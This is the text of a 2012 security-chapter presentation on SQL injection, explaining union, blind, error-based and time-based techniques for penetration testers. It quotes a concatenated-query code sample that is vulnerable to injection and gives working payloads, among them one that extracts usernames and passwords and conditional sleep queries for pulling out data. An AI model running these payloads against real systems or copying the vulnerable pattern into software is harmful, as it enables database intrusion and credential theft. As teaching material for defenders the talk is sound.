This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
5. DEFINITION
“SQL injection is an attack in which malicious code
is inserted into strings that are later passed to [a
database] for parsing and execution.”
“The primary form of SQL injection consists of
direct insertion of code into user-input variables
that are concatenated with SQL commands and
executed.”
Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
6. SAMPLE VULNERABLE CODE
var _shipCity = Request.form("ShipCity");
var sql = "select * from OrdersTable" +
" where ShipCity = " +
"'" + _shipCity + "'";
Source: http://msdn.microsoft.com/en-us/library/ms161953(v=sql.105).aspx
7. CATEGORIES OF SQL INJECTION
Normal
UNION queries
Blind
Boolean expressions
Error-based
Valid syntax that throws exceptions
Time-based
Resource intensive or sleep-style queries
8. EXAMPLES – NORMAL INJECTION
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Inject:
' UNION <data you want to extract> -- -
Example:
select ShipCity, Dest from Orders where
ShipCity='' UNION select Username, Password
from Users -- -'
9. EXAMPLES – BLIND INJECTION
var sql = "select * from Orders" +
" where ShipCity = '"+_shipCity+"'";
Inject:
<valid value>' and <positive expression>
<valid value>' and <negative expression>
Example:
select * from Orders where ShipCity='Memphis'
and '1'='1'
10. EXAMPLES – ERROR-BASED INJECTION
var sql = "select * from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select * from Orders where ShipCity='' and
1=CAST(suser_name() as INT)-- -'
Example (MySQL):
select * from Orders where ShipCity='' and
ExtractValue(0,CONCAT(0x5c,(select user())))-- -'
11. EXAMPLES – TIME-BASED INJECTION
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select ShipCity, Dest from Orders where
ShipCity='' waitfor delay '0:0:10'
Example (MySQL >= 5.0.12):
select ShipCity, Dest from Orders where
ShipCity='' UNION SELECT SLEEP(5), 2'
12. TIME-BASED + BLIND
Same:
Resource intensive or sleep/wait style
functions
New:
Extract arbitrary data
Bypass business functionality
13. EXAMPLES – TIME-BASED + BLIND
var sql = "select ShipCity, Dest from Orders" +
" where ShipCity = '"+_shipCity+"'";
Example (SQL Server):
select ShipCity, Dest from Orders where
ShipCity=''; if(<boolean>) waitfor delay '0:0:10'
Example (MySQL >= 5.0.12):
select ShipCity, Dest from Orders where
ShipCity='' UNION
SELECT IF(<bool>,SLEEP(5),1), '2'